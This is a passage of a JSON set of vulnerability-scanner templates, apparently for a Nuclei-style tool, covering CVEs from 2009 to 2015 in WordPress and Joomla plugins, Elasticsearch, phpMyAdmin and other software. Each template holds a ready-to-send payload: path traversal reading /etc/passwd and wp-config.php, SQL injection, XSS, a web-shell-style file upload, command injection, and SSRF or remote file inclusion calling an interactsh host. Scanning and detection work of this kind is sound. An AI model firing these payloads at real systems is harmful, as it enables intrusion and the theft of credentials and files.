Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5({{num}})),1)"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2015-3337","info":{"name":"Elasticsearch - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2807","info":{"name":"Navis DocumentCloud <0.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/navis-documentcloud/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Navis","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4694","info":{"name":"WordPress Zip Attachments <= 1.1.4 - Arbitrary File Retrieval","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4455","info":{"name":"WordPress Plugin Aviary Image Editor Addon For Gravity Forms 3.0 Beta - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET /?gf_page=upload HTTP/1.1\nHost: {{Hostname}}\n","POST /?gf_page=upload HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=a54906fe12c504cb01ca836d062f82fa\n\n--a54906fe12c504cb01ca836d062f82fa\nContent-Disposition: form-data; name=\"field_id\"\n\n3\n--a54906fe12c504cb01ca836d062f82fa\nContent-Disposition: form-data; name=\"form_id\"\n\n1\n--a54906fe12c504cb01ca836d062f82fa\nContent-Disposition: form-data; name=\"gform_unique_id\"\n\n../../../\n--a54906fe12c504cb01ca836d062f82fa\nContent-Disposition: form-data; name=\"name\"\n\n{{filename}}.phtml\n--a54906fe12c504cb01ca836d062f82fa\nContent-Disposition: form-data; name=\"file\"; filename=\"{{filename}}.jpg\"\nContent-Type: text/html\n\n{{randstr}}\n--a54906fe12c504cb01ca836d062f82fa--\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["contains(body_1, \"Failed to upload file\")","status_code_2 == 200","contains(body_2, \"uploaded_filename\\\":\\\"{{filename}}.jpg\")"],"condition":"and"}]}]},{"id":"CVE-2015-4414","info":{"name":"WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-5469","info":{"name":"WordPress MDC YouTube Downloader 2.1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-0554","info":{"name":"ADB/Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wlsecurity.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var wpapskkey","var WscDevPin","var sessionkey"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2067","info":{"name":"Magento Server MAGMI - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1579","info":{"name":"WordPress Slider Revolution - Local File Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php","{{BaseURL}}/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'DB_NAME'","'DB_PASSWORD'","'DB_USER'"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4666","info":{"name":"Xceedium Xsuite <=2.4.4.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/opm/read_sessionlog.php?logFile=....//....//....//....//etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-6477","info":{"name":"Nordex NC2  - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/login"],"body":"connection=basic&userName=admin%27%22%29%3B%7D%3C%2Fscript%3E%3Cscript%3Ealert%28%27{{randstr}}%27%29%3C%2Fscript%3E&pw=nordex&language=en","matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["</script><script>alert('{{randstr}}')</script>"]}]}]},{"id":"CVE-2015-5354","info":{"name":"Novius OS 5.0.1-elche - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/novius-os/admin/nos/login?redirect=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2015-7823","info":{"name":"Kentico CMS 8.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/CMSPages/GetDocLink.ashx?link=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2015-8813","info":{"name":"Umbraco <7.4.0- Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/Umbraco/feedproxy.aspx?url=http://{{interactsh-url}}"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2015-1635","info":{"name":"Microsoft Windows 'HTTP.sys' - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"headers":{"Range":"bytes=0-18446744073709551615"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["HTTP Error 416","The requested range is not satisfiable"],"condition":"and"},{"type":"word","part":"header","words":["Microsoft"]}]}]},{"id":"CVE-2009-3053","info":{"name":"Joomla! Agora 3.0.0b  - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-1496","info":{"name":"Joomla! Cmimarketplace 0.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-4202","info":{"name":"Joomla! Omilen Photo Gallery 0.5b - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-4223","info":{"name":"KR-Web <=1.1b2 - Remote File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/adm/krgourl.php?DOCUMENT_ROOT=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-4679","info":{"name":"Joomla! Portfolio Nexus - Remote File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-3318","info":{"name":"Joomla! Roland Breedveld Album 1.14 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-5114","info":{"name":"WebGlimpse 2.18.7 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-1872","info":{"name":"Adobe Coldfusion <=8.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/CFIDE/wizards/common/_logintowizard.cfm?%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-0932","info":{"name":"Horde/Horde Groupware - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-1151","info":{"name":"PhpMyAdmin Scripts - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /scripts/setup.php HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\naction=test&configuration=O:10:\"PMA_Config\":1:{s:6:\"source\",s:11:\"/etc/passwd\";}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-5020","info":{"name":"AWStats < 6.95 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/awstats/awredir.pl?url=interact.sh","{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=interact.sh"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2009-0545","info":{"name":"ZeroShell <= 1.0beta11 Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2009-2100","info":{"name":"Joomla! JoomlaPraise Projectfork  2.0.10 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_projectfork&section=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-1558","info":{"name":"Cisco Linksys WVC54GCA 1.00R22/1.00R24 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/adm/file.cgi?next_file=%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-2015","info":{"name":"Joomla! MooFAQ 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-0347","info":{"name":"Autonomy Ultraseek - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cs.html?url=http://www.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2010-1953","info":{"name":"Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1305","info":{"name":"Joomla! Component JInventory 1.23.02 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2045","info":{"name":"Joomla! Component FDione Form Wizard 1.0.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1304","info":{"name":"Joomla! Component User Status - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1352","info":{"name":"Joomla! Component Juke Box 1.7 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1983","info":{"name":"Joomla! Component redTWITTER 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0944","info":{"name":"Joomla! Component com_jcollection - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2307","info":{"name":"Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1345","info":{"name":"Joomla! Component Cookex Agency CKForms - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1858","info":{"name":"Joomla! Component SMEStorage - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1659","info":{"name":"Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1219","info":{"name":"Joomla! Component com_janews - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1977","info":{"name":"Joomla! Component J!WHMCS Integrator 1.5.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2507","info":{"name":"Joomla! Component Picasa2Gallery 1.2.8 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0696","info":{"name":"Joomla! Component Jw_allVideos - Arbitrary File Retrieval","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1534","info":{"name":"Joomla! Component Shoutbox Pro - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1494","info":{"name":"Joomla! Component AWDwall 1.5.4 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0157","info":{"name":"Joomla! Component com_biblestudy - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4239","info":{"name":"Tiki Wiki CMS Groupware 5.2 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini"],"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2010-1532","info":{"name":"Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2035","info":{"name":"Joomla! Component Percha Gallery 1.6 Beta - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1607","info":{"name":"Joomla! Component WMI 1.5.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-3426","info":{"name":"Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1601","info":{"name":"Joomla! Component JA Comment - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-3203","info":{"name":"Joomla! Component PicSell 1.0 - Arbitrary File Retrieval","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1878","info":{"name":"Joomla! Component OrgChart 1.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0972","info":{"name":"Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1353","info":{"name":"Joomla! Component LoginBox - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2034","info":{"name":"Joomla! Component Percha Image Attach 1.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1981","info":{"name":"Joomla! Component Fabrik 2.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0467","info":{"name":"Joomla! Component CCNewsLetter - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1475","info":{"name":"Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1979","info":{"name":"Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0985","info":{"name":"Joomla! Component com_abbrev - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1603","info":{"name":"Joomla! Component ZiMBCore 0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1586","info":{"name":"HP System Management Homepage (SMH) v2.x.x.x - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/red2301.html?RedirectUrl=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2010-1653","info":{"name":"Joomla! Component Graphics 1.0.6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1715","info":{"name":"Joomla! Component Online Exam 1.5.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-5278","info":{"name":"MODx manager - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2128","info":{"name":"Joomla! Component JE Quotation Form 1.0b1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1533","info":{"name":"Joomla! Component TweetLA 1.0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2857","info":{"name":"Joomla! Component Music Manager - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1722","info":{"name":"Joomla! Component Online Market 2.x - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1307","info":{"name":"Joomla! Component Magic Updater - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1723","info":{"name":"Joomla! Component iNetLanka Contact Us Draw Root Map 1.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1315","info":{"name":"Joomla! Component webERPcustomer - Local File 